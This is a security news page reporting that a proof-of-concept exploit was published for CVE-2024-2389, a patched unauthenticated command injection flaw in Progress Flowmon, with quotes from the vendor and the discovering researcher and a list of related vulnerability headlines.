Security News > 2024 > April > PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389)
![PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389)](/static/build/img/news/poc-for-critical-progress-flowmon-vulnerability-released-cve-2024-2389-medium.jpg)
More details of and a proof-of-concept exploit for an unauthenticated OS command injection vulnerability in Flowmon, Progress Software's network monitoring/analysis and security solution, have been published.
The critical vulnerability has been disclosed and patched by Progress earlier this month.
CVE-2024-2389 is command injection vulnerability affecting Flowmon versions 11.x and 12.x, but not versions 10.x and lower.
"Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication," the company explained.
The vulnerability was discovered and reported to Progress by David Yesland, a penetration tester at Rhino Security Labs, who detailed the discovery in a blog post published on Tuesday.
He noted that once the vulnerability is exploited and command execution is achieved, "The application runs as the 'flowmon' user so command will be executed as this user. The flowmon user can run several commands with sudo and several of the commands can be abused to obtain a root shell."
News URL
https://www.helpnetsecurity.com/2024/04/24/poc-cve-2024-2389/
Related news
- PoC for Progress Telerik RCE chain released (CVE-2024-4358, CVE-2024-1800) (source)
- PoC exploit for critical Fortra FileCatalyst flaw published (CVE-2024-5276) (source)
- Critical Exim vulnerability facilitates malware delivery (CVE-2024-39929) (source)
- Progress fixes critical RCE flaw in Telerik Report Server, upgrade ASAP! (CVE-2024-6327) (source)
- High-risk Atlassian Confluence RCE fixed, PoC available (CVE-2024-21683) (source)
- Exploit for critical Progress Telerik auth bypass released, patch now (source)
- SolarWinds fixes severe Serv-U vulnerability (CVE-2024-28995) (source)
- Microsoft Issues Patches for 51 Flaws, Including Critical MSMQ Vulnerability (source)
- Critical RCE flaws in vCenter Server fixed (CVE-2024-37079, CVE-2024-37080) (source)
- VMware fixes critical vCenter RCE vulnerability, patch now (source)